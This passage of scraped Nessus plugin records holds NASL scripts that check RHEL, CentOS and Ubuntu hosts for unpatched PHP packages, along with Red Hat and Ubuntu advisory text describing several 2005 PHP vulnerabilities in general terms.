reference:\"php-devel-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-26.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-26.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.9\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:05:33", "description": "Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Note that this\nvulnerability only affects installations which have register_globals\nenabled in the PHP configuration file, which is not a default or\nrecommended option. The Common Vulnerabilities and Exposures project\nassigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has\nbeen corrected.\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.", "edition": 27, "published": "2005-11-15T00:00:00", "title": "RHEL 2.1 : php (RHSA-2005:838)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2004-1019"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:php-devel", "cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:php-pgsql", "p-cpe:/a:redhat:enterprise_linux:php-ldap", "p-cpe:/a:redhat:enterprise_linux:php-odbc", "p-cpe:/a:redhat:enterprise_linux:php-imap", "p-cpe:/a:redhat:enterprise_linux:php-mysql", "p-cpe:/a:redhat:enterprise_linux:php", "p-cpe:/a:redhat:enterprise_linux:php-manual"], "id": "REDHAT-RHSA-2005-838.NASL", "href": "https://www.tenable.com/plugins/nessus/20207", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:838. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20207);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-1019\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"RHSA\", value:\"2005:838\");\n\n script_name(english:\"RHEL 2.1 : php (RHSA-2005:838)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 2.1\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA flaw was found in the way PHP registers global variables during a\nfile upload request. A remote attacker could submit a carefully\ncrafted multipart/form-data POST request that would overwrite the\n$GLOBALS array, altering expected script behavior, and possibly\nleading to the execution of arbitrary PHP commands. Note that this\nvulnerability only affects installations which have register_globals\nenabled in the PHP configuration file, which is not a default or\nrecommended option. The Common Vulnerabilities and Exposures project\nassigned the name CVE-2005-3390 to this issue.\n\nA flaw was found in the PHP parse_str() function. If a PHP script\npasses only one argument to the parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nAdditionally, a bug introduced in the updates to fix CVE-2004-1019 has\nbeen corrected.\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:838\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:838\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-devel-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-imap-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-ldap-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-manual-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-mysql-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-odbc-4.1.2-2.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"php-pgsql-4.1.2-2.3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-imap / php-ldap / php-manual / php-mysql / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:27:42", "description": "Eric Romang discovered a local Denial of Service vulnerability in the\nhandling of the 'session.save_path' parameter in PHP's Apache 2.0\nmodule. By setting this parameter to an invalid value in an .htaccess\nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an\nimage with specially crafted EXIF data to a PHP program that\nautomatically evaluates them (e. g. a web gallery), a remote attacker\ncould cause an infinite recursion in the PHP interpreter, which caused\nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the\nphpinfo() function. By tricking a user into retrieving a specially\ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker\ncould inject arbitrary HTML or web script into the output page and\npossibly steal private data like cookies or session identifiers.\n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function\nwhen it is called with just one argument. By calling such programs\nwith specially crafted parameters, a remote attacker could enable the\n'register_globals' option which is normally turned off for security\nreasons. Once this option is enabled, the remote attacker could\nexploit other security flaws of PHP programs which are normally\nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the\n$GLOBALS array in PHP programs that allow file uploads and run with\n'register_globals' enabled. Depending on the particular application,\nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check\nprocessed file names against the 'open_basedir' and 'safe_mode'\nrestrictions, which could be exploited to circumvent these\nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was\nfound in virtual() function. A local attacker could exploit this to\ncircumvent these restrictions with specially crafted PHP INI files\nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for\ninvalid embedded line breaks. By setting the 'To:' field of an email\nto a specially crafted value in a PHP web mail application, a remote\nattacker could inject arbitrary headers into the sent email.\n(CVE-2005-3883).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : php4, php5 vulnerabilities (USN-232-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "modified": "2006-01-21T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php4-domxml", "p-cpe:/a:canonical:ubuntu_linux:php4-common", "p-cpe:/a:canonical:ubuntu_linux:php4-mcal", "p-cpe:/a:canonical:ubuntu_linux:php4-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php4", "p-cpe:/a:canonical:ubuntu_linux:php4-universe-common", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php4-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php4-pear", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php4-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "p-cpe:/a:canonical:ubuntu_linux:php4-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php4-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:libapache-mod-php4", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:php4-odbc", "p-cpe:/a:canonical:ubuntu_linux:php4-recode", "p-cpe:/a:canonical:ubuntu_linux:php4-gd", "p-cpe:/a:canonical:ubuntu_linux:php4-mhash", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:php4-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4", "p-cpe:/a:canonical:ubuntu_linux:php5", "p-cpe:/a:canonical:ubuntu_linux:php4-xslt", "p-cpe:/a:canonical:ubuntu_linux:php4-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php4-imap", "p-cpe:/a:canonical:ubuntu_linux:php4-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php4-snmp", "p-cpe:/a:canonical:ubuntu_linux:php-pear"], "id": "UBUNTU_USN-232-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-232-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20776);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"USN\", value:\"232-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : php4, php5 vulnerabilities (USN-232-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric Romang discovered a local Denial of Service vulnerability in the\nhandling of the 'session.save_path' parameter in PHP's Apache 2.0\nmodule. By setting this parameter to an invalid value in an .htaccess\nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an\nimage with specially crafted EXIF data to a PHP program that\nautomatically evaluates them (e. g. a web gallery), a remote attacker\ncould cause an infinite recursion in the PHP interpreter, which caused\nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the\nphpinfo() function. By tricking a user into retrieving a specially\ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker\ncould inject arbitrary HTML or web script into the output page and\npossibly steal private data like cookies or session identifiers.\n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function\nwhen it is called with just one argument. By calling such programs\nwith specially crafted parameters, a remote attacker could enable the\n'register_globals' option which is normally turned off for security\nreasons. Once this option is enabled, the remote attacker could\nexploit other security flaws of PHP programs which are normally\nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the\n$GLOBALS array in PHP programs that allow file uploads and run with\n'register_globals' enabled. Depending on the particular application,\nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check\nprocessed file names against the 'open_basedir' and 'safe_mode'\nrestrictions, which could be exploited to circumvent these\nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was\nfound in virtual() function. A local attacker could exploit this to\ncircumvent these restrictions with specially crafted PHP INI files\nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for\ninvalid embedded line breaks. By setting the 'To:' field of an email\nto a specially crafted value in a PHP web mail application, a remote\nattacker could inject arbitrary headers into the sent email.\n(CVE-2005-3883).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache-mod-php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-universe-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php4-xslt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mhash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-sybase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:4.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:5.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2005-2019 Canonical, Inc. / NASL script (C) 2006-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(4\\.10|5\\.04|5\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 4.10 / 5.04 / 5.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"4.10\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-cgi\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-curl\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-dev\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-domxml\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif 